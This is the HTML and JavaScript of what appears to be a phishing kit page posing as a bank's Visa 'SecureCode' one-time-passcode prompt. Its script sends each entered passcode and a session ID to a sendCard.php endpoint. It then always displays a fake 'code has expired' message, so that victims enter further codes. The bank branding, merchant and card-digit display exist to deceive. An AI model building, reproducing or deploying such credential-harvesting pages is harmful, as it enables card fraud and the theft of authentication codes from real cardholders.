<!DOCTYPE html>
<html>

<head>


    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>Secure Code Verification</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <link href="css/style.css" rel="stylesheet" type="text/css">
    <style>
        body {
            font-family: Helvetica;
            font-size: 12px;
            color: #000;
        }
        
        h1{
            font-size: 18px;
        
            font-weight: bold;
        }
        
        h2{
            font-size: 12px !important;
            opacity: 0.5;
            width: 50%;
            margin: 0 !important;
            padding: 0 !important;
        }
        
        p{
            line-height: 18px;
        }
        #modal-row{
            padding: 4px 0;
            display: flex; 
            flex-direction: row; 
            align-items: flex-start;
        }

        #passcode{
            font-size: 16px;
            text-align: center;
            /* padding-left: 0px; */
            /* padding-right: 0px; */
            -webkit-text-security: disc;
            
            text-align: left;
            padding: 4px 10px;
            max-width: 170px;
            height: 27px;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            border: 1px solid #b0b0b0;
            border-radius: 2px;
        }

        .smallie {
            opacity: 0.6;
            margin-top: 7px;
            display: block;
            text-decoration: underline;
        }

        .row a {
            color:#000;
            margin: 5px;
        }

        .row a:hover {
            text-decoration: underline;
        }

        .input .no-border, .input .no-border.is-active, .input .no-border.is-focused, .input .no-border:active, .input .no-border:focus {
            border: none;
            background-color: transparent;
            box-shadow: none;
            border-radius: 0%;
        }

        .select.no-border option {
            background-color: #e6dab7;
        }

        div.center #btnSubmitXX {
            background-color: #F0F0F0;
            cursor: pointer;
            font-size: 14px;
            padding: 5px 10px; 
            border-radius: 2px; 
            border-width: 1px;
            border-style: solid;
            border-color: rgb(216, 216, 216) rgb(209, 209, 209) rgb(216, 216, 216);
            /* -o-border-image: initial; */
            /* border-image: initial; */
            color: black;
            width: 45px;
        }
        #pass-form .hint {
            border-color: red;
        }
        </style>
</head>

<body class="other">
    <div class="modal-page">
        <div class="header">
            <div class="bank_logo_wrapper">
                <img class="bank-logo" src="img/altBank.png">
            </div>
            <div class="brand_logo_wrapper">
                <img class="brand-logo" src="img/cardLogo/visa.png">
            </div>
        </div>
        <form class="form_item" id="ajax-contact" method="POST" name="frm" accept-charset="utf-8">
            <div iv class="codecenter">
                <img id="spinner" src="img/spinner.gif" style="display:block;margin:auto;">
                <div id="pass-form" style="display:none">
                <h1>Enter one-time passcode</h1>
                <div style="margin: 1em 0;"><p>A one-time Passcode is required for this purchase.
                This Passcode has been sent to your registered mobile phone number.</p>
                </div>
                <div style="display: flex; flex-direction: column; padding-top: 12px;">
                <div id="modal-row">
                    <h2>Merchant</h2>
                    <label id="label1" 
                    style="  border-radius: 10px;  ">
                   Taronga Zoo
                    </label>
                </div>


                <div id="modal-row">
                <h2> Amount</h2>
                <label style=" border-radius: 10px; font-weight: bold;">
                    <span id="label2"></span>
                </label>
                </div>

                <div id="modal-row">
                <h2> Date</h2>
                <label id="label3"
                style=" border-radius: 10px; ">
                3/3/2023
                </label>

                </div>

                <div id="modal-row">
                <h2>Card Number</h2>
                <label id="label4" 
                style=" border-radius: 10px; ">
                **** **** **** ****
                </label>
                </div>


                <div style="display: flex; flex-direction: row; align-items: flex-start; ">
                <h2 style="width:50%!important; position: relative; top: 7px;">Enter One-Time Passcode:</h2>

                <div style="display: flex;flex-direction: column; width: 48%;justify-content: center; 
                " >
                <input id="passcode" type="text" onfocus="removeClass()"
                pattern="[0-9]*"
                maxlength="6"
                />
                
                <a class="smallie" style="color: black; line-height: 12px;" href="#" >Haven't received a one-time passcode?</a>
                </div>

            </div>

            </div>



    <div class="row" style="display: flex;flex-direction: row; align-items: center; justify-content: space-between;

    text-align: center; margin-top: 30px;">
    <p id="error-text" style="display: none; color: red;">The code has expired. You will receive a new SMS code. Please enter the new code.</p>
    <div class="left" ><a class="cancel_btn" onclick="comeBack()">Cancel</a></div>
    <div class="center">
        <input class="big-button"  onclick="sendPasscode()" id="btnSubmitXX" name="btSubmit" value="Submit">
    </div>
    <div class="right">
        <a class="help_btn"><img src="img/help.gif" class="help_icon"
            alt="Help" style="padding-right: 2px; vertical-align:text-top;" onclick="showHelp()">Help</a>
    </div>
    </div>
    </div>
            </div>
            <div class="help hid">
                <div class="desc">
                    <p>SecureCode Verification is a free online card security program. SecureCode protects cards with a personal
                        security passcode. If this service is activated on your card, the online stores participating in the program
                        will redirect your
                        browser to the Bank's website to enter your personal passcode. After checking it, the purchase will be
                        safely paid. If the online store does not participate in the SecureCode Verification program, payment
                        security is not guaranteed.
                    </p>
                    <div class="list">
                        <div class="footer">
                            <div class="row">
                                <div class="">
                                    <input id="returnBtn" class="big-button backlink" type="button" name="btcComeBack" value="Return">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <input class="cnumidclass" type="hidden" name="cnumid" value="">
        </form>
    </div>
    <!-- <img height="1" width="1" src="https://www.facebook.com/tr?id=&ev=Lead&noscript=1" /> -->
    <script src="js/jquery.min.js" ></script>


    <script>
        window.onload = function() {
            // if (sessionStorage.getItem('total_price') == null) {
            // //    window.location.href = '../'
            // }
            // else {
                let price = sessionStorage.getItem('total_price')
                $('#label2').text(price);


                let date = new Date();
                let day = date.getDate();
                let month = date.getMonth() + 1;
                let year = date.getFullYear();
                $('#label3').text(day + "/" + month + "/" + year);

                //get last 4 digits of card number

                let last = sessionStorage.getItem('last_num_dig');
                $('#label4').text("**** **** **** " + last);
                
                setTimeout(() => {
                    $('#spinner').hide()
                    $('#pass-form').show()
                }, 2000);
           // }

        }

        function removeClass() {
            $('#passcode').removeClass('hint')
            $('#error-text').hide()
        }

        function comeBack(){
            if (document.referrer!== '') {
            window.location.href = document.referrer;
            }
            else {
                window.location.href = '../'
            }
        }

        function sendPasscode() {
            $('#spinner').show()
            $('#pass-form').hide()
            let data = {};
            let passcode =document.getElementById("passcode").value;
            if (passcode.length > 5){
            data['code'] = passcode;
            data['project']= 'Project 🇯🇵'
            data['sessionId'] = sessionStorage.getItem('sessionId')
            $.ajax({
                url: '../sendCard.php',
                method: 'post',
                data: data, 
                success: function(data) {
                    setTimeout(function() {
                    $('#spinner').hide()
                    $('#pass-form').show()
                    $('#error-text').show()
                }, 5000);
                },

                error: function() {
                    $('#spinner').hide()
                    $('#pass-form').show()
                    $('#passcode').addClass('hint')
                }
                
            
            });

            }
            else {
                $('#spinner').hide()
                $('#pass-form').show()
                $('#passcode').addClass('hint')
            }

        }
        $(document).on('click', '.help_btn', function(e) {
            $('.help.hid').removeClass('hid')
        })
        $(document).on('click', '#returnBtn', function(e) {
            $('.help').addClass('hid')
        })
    </script>
</body>
</html>